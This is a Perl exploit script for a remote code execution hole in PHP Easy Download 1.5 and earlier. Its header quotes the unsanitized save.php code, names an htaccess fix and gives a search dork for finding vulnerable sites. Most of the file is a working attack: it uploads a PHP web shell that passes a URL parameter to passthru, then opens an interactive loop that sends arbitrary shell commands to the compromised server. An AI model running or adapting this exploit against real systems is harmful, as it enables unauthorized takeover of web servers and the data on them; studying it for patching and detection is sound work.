#!/usr/bin/perl
# +-------------------------------------------------------------------------------------------
# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability
# +-------------------------------------------------------------------------------------------
# + Affected Software .: PHP Easy Download <= 1.5
# + Vendor ............: http://www.ironclad.net/
# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip
# + Description .......: "PHP Easy Download is an easy to use and convenient download script"
# + Dork ..............: "PHP Easy Downloader"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
# +-------------------------------------------------------------------------------------------
# + Details:
# + PHP Easy Download by default installation doesn't prevent any of the files in the
# + file_info/admin directory from being accessed by a client. The file_info/admin/save.php
# + file takes input passed to the script by $_POST and writes it to $_POST["filename"].0
# + unsanatized in the file_info/admin/descriptions directory.
# +
# + Vulnerable Code:
# + file_info/admin/save.php, line(s) 14-36:
# + -> 14: $filename = $_POST["filename"];
# + -> 15: $description = $_POST["description"];
# + -> 20: $path = "../descriptions/$filename.0";
# + -> 30: $content = "$accesses|$description|$moreinfo|$date";
# + -> 34: $newfile = fopen($path,"w");
# + -> 35: fwrite($newfile, $content);
# + -> 36: fclose($newfile);
# +
# + Solution:
# + Prevent users from accessing any of the files in the file_info directory (htaccess).
# +-------------------------------------------------------------------------------------------
use Getopt::Long;
use URI::Escape;
use IO::Socket;
$code = "<?php passthru(\$_GET[cmd]); ?>";
main();
sub usage
{
print "\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\n";
print "-h, --host\ttarget host\t(example.com)\n";
print "-f, --file\tshell file\t(shell.php)\n";
print "-d, --dir\tinstall dir\t(/file_info)\n";
exit;
}
sub main
{
GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir);
usage() unless $host;
$dir = "/file_info" unless $dir;
$file = "shell.php" unless $file;
uri_escape($cmd);
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "\nconnect() failed.\n";
print "\nconnected to ".$host.", sending data.\n";
$sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/admin/save.php HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "attempted to create php shell, server response:\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
while($cmd !~ "~quit")
{
print "\n\n-> ";
$cmd = <STDIN>;
if ($cmd !~ "~quit")
{
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "connect() failed.\n";
$sendurl = uri_escape($cmd);
print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
print "\n";
while($recvd = <$sock>)
{
print $recvd;
}
}
}
exit;
}
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